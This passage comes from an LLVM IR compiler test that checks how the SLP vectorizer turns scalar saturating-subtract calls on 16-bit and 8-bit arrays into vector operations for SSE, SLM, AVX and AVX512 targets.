; SSE-NEXT: store <8 x i16> [[TMP12]], <8 x i16>* bitcast (i16* getelementptr inbounds ([32 x i16], [32 x i16]* @c16, i32 0, i64 24) to <8 x i16>*), align 2
; SSE-NEXT: ret void
;
; SLM-LABEL: @sub_v32i16(
; SLM-NEXT: [[TMP1:%.*]] = load <8 x i16>, <8 x i16>* bitcast ([32 x i16]* @a16 to <8 x i16>*), align 2
; SLM-NEXT: [[TMP2:%.*]] = load <8 x i16>, <8 x i16>* bitcast (i16* getelementptr inbounds ([32 x i16], [32 x i16]* @a16, i32 0, i64 8) to <8 x i16>*), align 2
; SLM-NEXT: [[TMP3:%.*]] = load <8 x i16>, <8 x i16>* bitcast (i16* getelementptr inbounds ([32 x i16], [32 x i16]* @a16, i32 0, i64 16) to <8 x i16>*), align 2
; SLM-NEXT: [[TMP4:%.*]] = load <8 x i16>, <8 x i16>* bitcast (i16* getelementptr inbounds ([32 x i16], [32 x i16]* @a16, i32 0, i64 24) to <8 x i16>*), align 2
; SLM-NEXT: [[TMP5:%.*]] = load <8 x i16>, <8 x i16>* bitcast ([32 x i16]* @b16 to <8 x i16>*), align 2
; SLM-NEXT: [[TMP6:%.*]] = load <8 x i16>, <8 x i16>* bitcast (i16* getelementptr inbounds ([32 x i16], [32 x i16]* @b16, i32 0, i64 8) to <8 x i16>*), align 2
; SLM-NEXT: [[TMP7:%.*]] = load <8 x i16>, <8 x i16>* bitcast (i16* getelementptr inbounds ([32 x i16], [32 x i16]* @b16, i32 0, i64 16) to <8 x i16>*), align 2
; SLM-NEXT: [[TMP8:%.*]] = load <8 x i16>, <8 x i16>* bitcast (i16* getelementptr inbounds ([32 x i16], [32 x i16]* @b16, i32 0, i64 24) to <8 x i16>*), align 2
; SLM-NEXT: [[TMP9:%.*]] = call <8 x i16> @llvm.ssub.sat.v8i16(<8 x i16> [[TMP1]], <8 x i16> [[TMP5]])
; SLM-NEXT: [[TMP10:%.*]] = call <8 x i16> @llvm.ssub.sat.v8i16(<8 x i16> [[TMP2]], <8 x i16> [[TMP6]])
; SLM-NEXT: [[TMP11:%.*]] = call <8 x i16> @llvm.ssub.sat.v8i16(<8 x i16> [[TMP3]], <8 x i16> [[TMP7]])
; SLM-NEXT: [[TMP12:%.*]] = call <8 x i16> @llvm.ssub.sat.v8i16(<8 x i16> [[TMP4]], <8 x i16> [[TMP8]])
; SLM-NEXT: store <8 x i16> [[TMP9]], <8 x i16>* bitcast ([32 x i16]* @c16 to <8 x i16>*), align 2
; SLM-NEXT: store <8 x i16> [[TMP10]], <8 x i16>* bitcast (i16* getelementptr inbounds ([32 x i16], [32 x i16]* @c16, i32 0, i64 8) to <8 x i16>*), align 2
; SLM-NEXT: store <8 x i16> [[TMP11]], <8 x i16>* bitcast (i16* getelementptr inbounds ([32 x i16], [32 x i16]* @c16, i32 0, i64 16) to <8 x i16>*), align 2
; SLM-NEXT: store <8 x i16> [[TMP12]], <8 x i16>* bitcast (i16* getelementptr inbounds ([32 x i16], [32 x i16]* @c16, i32 0, i64 24) to <8 x i16>*), align 2
; SLM-NEXT: ret void
;
; AVX-LABEL: @sub_v32i16(
; AVX-NEXT: [[TMP1:%.*]] = load <16 x i16>, <16 x i16>* bitcast ([32 x i16]* @a16 to <16 x i16>*), align 2
; AVX-NEXT: [[TMP2:%.*]] = load <16 x i16>, <16 x i16>* bitcast (i16* getelementptr inbounds ([32 x i16], [32 x i16]* @a16, i32 0, i64 16) to <16 x i16>*), align 2
; AVX-NEXT: [[TMP3:%.*]] = load <16 x i16>, <16 x i16>* bitcast ([32 x i16]* @b16 to <16 x i16>*), align 2
; AVX-NEXT: [[TMP4:%.*]] = load <16 x i16>, <16 x i16>* bitcast (i16* getelementptr inbounds ([32 x i16], [32 x i16]* @b16, i32 0, i64 16) to <16 x i16>*), align 2
; AVX-NEXT: [[TMP5:%.*]] = call <16 x i16> @llvm.ssub.sat.v16i16(<16 x i16> [[TMP1]], <16 x i16> [[TMP3]])
; AVX-NEXT: [[TMP6:%.*]] = call <16 x i16> @llvm.ssub.sat.v16i16(<16 x i16> [[TMP2]], <16 x i16> [[TMP4]])
; AVX-NEXT: store <16 x i16> [[TMP5]], <16 x i16>* bitcast ([32 x i16]* @c16 to <16 x i16>*), align 2
; AVX-NEXT: store <16 x i16> [[TMP6]], <16 x i16>* bitcast (i16* getelementptr inbounds ([32 x i16], [32 x i16]* @c16, i32 0, i64 16) to <16 x i16>*), align 2
; AVX-NEXT: ret void
;
; AVX512-LABEL: @sub_v32i16(
; AVX512-NEXT: [[TMP1:%.*]] = load <16 x i16>, <16 x i16>* bitcast ([32 x i16]* @a16 to <16 x i16>*), align 2
; AVX512-NEXT: [[TMP2:%.*]] = load <16 x i16>, <16 x i16>* bitcast (i16* getelementptr inbounds ([32 x i16], [32 x i16]* @a16, i32 0, i64 16) to <16 x i16>*), align 2
; AVX512-NEXT: [[TMP3:%.*]] = load <16 x i16>, <16 x i16>* bitcast ([32 x i16]* @b16 to <16 x i16>*), align 2
; AVX512-NEXT: [[TMP4:%.*]] = load <16 x i16>, <16 x i16>* bitcast (i16* getelementptr inbounds ([32 x i16], [32 x i16]* @b16, i32 0, i64 16) to <16 x i16>*), align 2
; AVX512-NEXT: [[TMP5:%.*]] = call <16 x i16> @llvm.ssub.sat.v16i16(<16 x i16> [[TMP1]], <16 x i16> [[TMP3]])
; AVX512-NEXT: [[TMP6:%.*]] = call <16 x i16> @llvm.ssub.sat.v16i16(<16 x i16> [[TMP2]], <16 x i16> [[TMP4]])
; AVX512-NEXT: store <16 x i16> [[TMP5]], <16 x i16>* bitcast ([32 x i16]* @c16 to <16 x i16>*), align 2
; AVX512-NEXT: store <16 x i16> [[TMP6]], <16 x i16>* bitcast (i16* getelementptr inbounds ([32 x i16], [32 x i16]* @c16, i32 0, i64 16) to <16 x i16>*), align 2
; AVX512-NEXT: ret void
;
%a0 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @a16, i32 0, i64 0 ), align 2
%a1 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @a16, i32 0, i64 1 ), align 2
%a2 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @a16, i32 0, i64 2 ), align 2
%a3 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @a16, i32 0, i64 3 ), align 2
%a4 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @a16, i32 0, i64 4 ), align 2
%a5 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @a16, i32 0, i64 5 ), align 2
%a6 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @a16, i32 0, i64 6 ), align 2
%a7 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @a16, i32 0, i64 7 ), align 2
%a8 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @a16, i32 0, i64 8 ), align 2
%a9 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @a16, i32 0, i64 9 ), align 2
%a10 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @a16, i32 0, i64 10), align 2
%a11 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @a16, i32 0, i64 11), align 2
%a12 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @a16, i32 0, i64 12), align 2
%a13 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @a16, i32 0, i64 13), align 2
%a14 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @a16, i32 0, i64 14), align 2
%a15 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @a16, i32 0, i64 15), align 2
%a16 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @a16, i32 0, i64 16), align 2
%a17 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @a16, i32 0, i64 17), align 2
%a18 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @a16, i32 0, i64 18), align 2
%a19 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @a16, i32 0, i64 19), align 2
%a20 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @a16, i32 0, i64 20), align 2
%a21 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @a16, i32 0, i64 21), align 2
%a22 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @a16, i32 0, i64 22), align 2
%a23 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @a16, i32 0, i64 23), align 2
%a24 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @a16, i32 0, i64 24), align 2
%a25 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @a16, i32 0, i64 25), align 2
%a26 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @a16, i32 0, i64 26), align 2
%a27 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @a16, i32 0, i64 27), align 2
%a28 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @a16, i32 0, i64 28), align 2
%a29 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @a16, i32 0, i64 29), align 2
%a30 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @a16, i32 0, i64 30), align 2
%a31 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @a16, i32 0, i64 31), align 2
%b0 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @b16, i32 0, i64 0 ), align 2
%b1 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @b16, i32 0, i64 1 ), align 2
%b2 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @b16, i32 0, i64 2 ), align 2
%b3 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @b16, i32 0, i64 3 ), align 2
%b4 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @b16, i32 0, i64 4 ), align 2
%b5 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @b16, i32 0, i64 5 ), align 2
%b6 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @b16, i32 0, i64 6 ), align 2
%b7 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @b16, i32 0, i64 7 ), align 2
%b8 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @b16, i32 0, i64 8 ), align 2
%b9 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @b16, i32 0, i64 9 ), align 2
%b10 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @b16, i32 0, i64 10), align 2
%b11 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @b16, i32 0, i64 11), align 2
%b12 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @b16, i32 0, i64 12), align 2
%b13 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @b16, i32 0, i64 13), align 2
%b14 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @b16, i32 0, i64 14), align 2
%b15 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @b16, i32 0, i64 15), align 2
%b16 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @b16, i32 0, i64 16), align 2
%b17 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @b16, i32 0, i64 17), align 2
%b18 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @b16, i32 0, i64 18), align 2
%b19 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @b16, i32 0, i64 19), align 2
%b20 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @b16, i32 0, i64 20), align 2
%b21 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @b16, i32 0, i64 21), align 2
%b22 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @b16, i32 0, i64 22), align 2
%b23 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @b16, i32 0, i64 23), align 2
%b24 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @b16, i32 0, i64 24), align 2
%b25 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @b16, i32 0, i64 25), align 2
%b26 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @b16, i32 0, i64 26), align 2
%b27 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @b16, i32 0, i64 27), align 2
%b28 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @b16, i32 0, i64 28), align 2
%b29 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @b16, i32 0, i64 29), align 2
%b30 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @b16, i32 0, i64 30), align 2
%b31 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @b16, i32 0, i64 31), align 2
%r0 = call i16 @llvm.ssub.sat.i16(i16 %a0 , i16 %b0 )
%r1 = call i16 @llvm.ssub.sat.i16(i16 %a1 , i16 %b1 )
%r2 = call i16 @llvm.ssub.sat.i16(i16 %a2 , i16 %b2 )
%r3 = call i16 @llvm.ssub.sat.i16(i16 %a3 , i16 %b3 )
%r4 = call i16 @llvm.ssub.sat.i16(i16 %a4 , i16 %b4 )
%r5 = call i16 @llvm.ssub.sat.i16(i16 %a5 , i16 %b5 )
%r6 = call i16 @llvm.ssub.sat.i16(i16 %a6 , i16 %b6 )
%r7 = call i16 @llvm.ssub.sat.i16(i16 %a7 , i16 %b7 )
%r8 = call i16 @llvm.ssub.sat.i16(i16 %a8 , i16 %b8 )
%r9 = call i16 @llvm.ssub.sat.i16(i16 %a9 , i16 %b9 )
%r10 = call i16 @llvm.ssub.sat.i16(i16 %a10, i16 %b10)
%r11 = call i16 @llvm.ssub.sat.i16(i16 %a11, i16 %b11)
%r12 = call i16 @llvm.ssub.sat.i16(i16 %a12, i16 %b12)
%r13 = call i16 @llvm.ssub.sat.i16(i16 %a13, i16 %b13)
%r14 = call i16 @llvm.ssub.sat.i16(i16 %a14, i16 %b14)
%r15 = call i16 @llvm.ssub.sat.i16(i16 %a15, i16 %b15)
%r16 = call i16 @llvm.ssub.sat.i16(i16 %a16, i16 %b16)
%r17 = call i16 @llvm.ssub.sat.i16(i16 %a17, i16 %b17)
%r18 = call i16 @llvm.ssub.sat.i16(i16 %a18, i16 %b18)
%r19 = call i16 @llvm.ssub.sat.i16(i16 %a19, i16 %b19)
%r20 = call i16 @llvm.ssub.sat.i16(i16 %a20, i16 %b20)
%r21 = call i16 @llvm.ssub.sat.i16(i16 %a21, i16 %b21)
%r22 = call i16 @llvm.ssub.sat.i16(i16 %a22, i16 %b22)
%r23 = call i16 @llvm.ssub.sat.i16(i16 %a23, i16 %b23)
%r24 = call i16 @llvm.ssub.sat.i16(i16 %a24, i16 %b24)
%r25 = call i16 @llvm.ssub.sat.i16(i16 %a25, i16 %b25)
%r26 = call i16 @llvm.ssub.sat.i16(i16 %a26, i16 %b26)
%r27 = call i16 @llvm.ssub.sat.i16(i16 %a27, i16 %b27)
%r28 = call i16 @llvm.ssub.sat.i16(i16 %a28, i16 %b28)
%r29 = call i16 @llvm.ssub.sat.i16(i16 %a29, i16 %b29)
%r30 = call i16 @llvm.ssub.sat.i16(i16 %a30, i16 %b30)
%r31 = call i16 @llvm.ssub.sat.i16(i16 %a31, i16 %b31)
store i16 %r0 , i16* getelementptr inbounds ([32 x i16], [32 x i16]* @c16, i32 0, i64 0 ), align 2
store i16 %r1 , i16* getelementptr inbounds ([32 x i16], [32 x i16]* @c16, i32 0, i64 1 ), align 2
store i16 %r2 , i16* getelementptr inbounds ([32 x i16], [32 x i16]* @c16, i32 0, i64 2 ), align 2
store i16 %r3 , i16* getelementptr inbounds ([32 x i16], [32 x i16]* @c16, i32 0, i64 3 ), align 2
store i16 %r4 , i16* getelementptr inbounds ([32 x i16], [32 x i16]* @c16, i32 0, i64 4 ), align 2
store i16 %r5 , i16* getelementptr inbounds ([32 x i16], [32 x i16]* @c16, i32 0, i64 5 ), align 2
store i16 %r6 , i16* getelementptr inbounds ([32 x i16], [32 x i16]* @c16, i32 0, i64 6 ), align 2
store i16 %r7 , i16* getelementptr inbounds ([32 x i16], [32 x i16]* @c16, i32 0, i64 7 ), align 2
store i16 %r8 , i16* getelementptr inbounds ([32 x i16], [32 x i16]* @c16, i32 0, i64 8 ), align 2
store i16 %r9 , i16* getelementptr inbounds ([32 x i16], [32 x i16]* @c16, i32 0, i64 9 ), align 2
store i16 %r10, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @c16, i32 0, i64 10), align 2
store i16 %r11, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @c16, i32 0, i64 11), align 2
store i16 %r12, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @c16, i32 0, i64 12), align 2
store i16 %r13, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @c16, i32 0, i64 13), align 2
store i16 %r14, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @c16, i32 0, i64 14), align 2
store i16 %r15, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @c16, i32 0, i64 15), align 2
store i16 %r16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @c16, i32 0, i64 16), align 2
store i16 %r17, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @c16, i32 0, i64 17), align 2
store i16 %r18, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @c16, i32 0, i64 18), align 2
store i16 %r19, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @c16, i32 0, i64 19), align 2
store i16 %r20, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @c16, i32 0, i64 20), align 2
store i16 %r21, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @c16, i32 0, i64 21), align 2
store i16 %r22, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @c16, i32 0, i64 22), align 2
store i16 %r23, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @c16, i32 0, i64 23), align 2
store i16 %r24, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @c16, i32 0, i64 24), align 2
store i16 %r25, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @c16, i32 0, i64 25), align 2
store i16 %r26, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @c16, i32 0, i64 26), align 2
store i16 %r27, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @c16, i32 0, i64 27), align 2
store i16 %r28, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @c16, i32 0, i64 28), align 2
store i16 %r29, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @c16, i32 0, i64 29), align 2
store i16 %r30, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @c16, i32 0, i64 30), align 2
store i16 %r31, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @c16, i32 0, i64 31), align 2
ret void
}
define void @sub_v64i8() {
; CHECK-LABEL: @sub_v64i8(
; CHECK-NEXT: [[TMP1:%.*]] = load <16 x i8>, <16 x i8>* bitcast ([64 x i8]* @a8 to <16 x i8>*), align 1
; CHECK-NEXT: [[TMP2:%.*]] = load <16 x i8>, <16 x i8>* bitcast (i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 16) to <16 x i8>*), align 1
; CHECK-NEXT: [[TMP3:%.*]] = load <16 x i8>, <16 x i8>* bitcast (i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 32) to <16 x i8>*), align 1
; CHECK-NEXT: [[TMP4:%.*]] = load <16 x i8>, <16 x i8>* bitcast (i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 48) to <16 x i8>*), align 1
; CHECK-NEXT: [[TMP5:%.*]] = load <16 x i8>, <16 x i8>* bitcast ([64 x i8]* @b8 to <16 x i8>*), align 1
; CHECK-NEXT: [[TMP6:%.*]] = load <16 x i8>, <16 x i8>* bitcast (i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 16) to <16 x i8>*), align 1
; CHECK-NEXT: [[TMP7:%.*]] = load <16 x i8>, <16 x i8>* bitcast (i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 32) to <16 x i8>*), align 1
; CHECK-NEXT: [[TMP8:%.*]] = load <16 x i8>, <16 x i8>* bitcast (i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 48) to <16 x i8>*), align 1
; CHECK-NEXT: [[TMP9:%.*]] = call <16 x i8> @llvm.ssub.sat.v16i8(<16 x i8> [[TMP1]], <16 x i8> [[TMP5]])
; CHECK-NEXT: [[TMP10:%.*]] = call <16 x i8> @llvm.ssub.sat.v16i8(<16 x i8> [[TMP2]], <16 x i8> [[TMP6]])
; CHECK-NEXT: [[TMP11:%.*]] = call <16 x i8> @llvm.ssub.sat.v16i8(<16 x i8> [[TMP3]], <16 x i8> [[TMP7]])
; CHECK-NEXT: [[TMP12:%.*]] = call <16 x i8> @llvm.ssub.sat.v16i8(<16 x i8> [[TMP4]], <16 x i8> [[TMP8]])
; CHECK-NEXT: store <16 x i8> [[TMP9]], <16 x i8>* bitcast ([64 x i8]* @c8 to <16 x i8>*), align 1
; CHECK-NEXT: store <16 x i8> [[TMP10]], <16 x i8>* bitcast (i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 16) to <16 x i8>*), align 1
; CHECK-NEXT: store <16 x i8> [[TMP11]], <16 x i8>* bitcast (i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 32) to <16 x i8>*), align 1
; CHECK-NEXT: store <16 x i8> [[TMP12]], <16 x i8>* bitcast (i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 48) to <16 x i8>*), align 1
; CHECK-NEXT: ret void
;
%a0 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 0 ), align 1
%a1 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 1 ), align 1
%a2 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 2 ), align 1
%a3 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 3 ), align 1
%a4 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 4 ), align 1
%a5 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 5 ), align 1
%a6 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 6 ), align 1
%a7 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 7 ), align 1
%a8 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 8 ), align 1
%a9 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 9 ), align 1
%a10 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 10), align 1
%a11 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 11), align 1
%a12 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 12), align 1
%a13 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 13), align 1
%a14 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 14), align 1
%a15 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 15), align 1
%a16 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 16), align 1
%a17 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 17), align 1
%a18 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 18), align 1
%a19 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 19), align 1
%a20 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 20), align 1
%a21 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 21), align 1
%a22 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 22), align 1
%a23 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 23), align 1
%a24 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 24), align 1
%a25 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 25), align 1
%a26 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 26), align 1
%a27 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 27), align 1
%a28 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 28), align 1
%a29 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 29), align 1
%a30 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 30), align 1
%a31 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 31), align 1
%a32 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 32), align 1
%a33 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 33), align 1
%a34 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 34), align 1
%a35 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 35), align 1
%a36 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 36), align 1
%a37 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 37), align 1
%a38 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 38), align 1
%a39 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 39), align 1
%a40 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 40), align 1
%a41 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 41), align 1
%a42 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 42), align 1
%a43 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 43), align 1
%a44 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 44), align 1
%a45 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 45), align 1
%a46 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 46), align 1
%a47 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 47), align 1
%a48 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 48), align 1
%a49 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 49), align 1
%a50 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 50), align 1
%a51 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 51), align 1
%a52 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 52), align 1
%a53 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 53), align 1
%a54 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 54), align 1
%a55 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 55), align 1
%a56 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 56), align 1
%a57 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 57), align 1
%a58 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 58), align 1
%a59 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 59), align 1
%a60 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 60), align 1
%a61 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 61), align 1
%a62 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 62), align 1
%a63 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 63), align 1
%b0 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 0 ), align 1
%b1 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 1 ), align 1
%b2 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 2 ), align 1
%b3 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 3 ), align 1
%b4 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 4 ), align 1
%b5 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 5 ), align 1
%b6 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 6 ), align 1
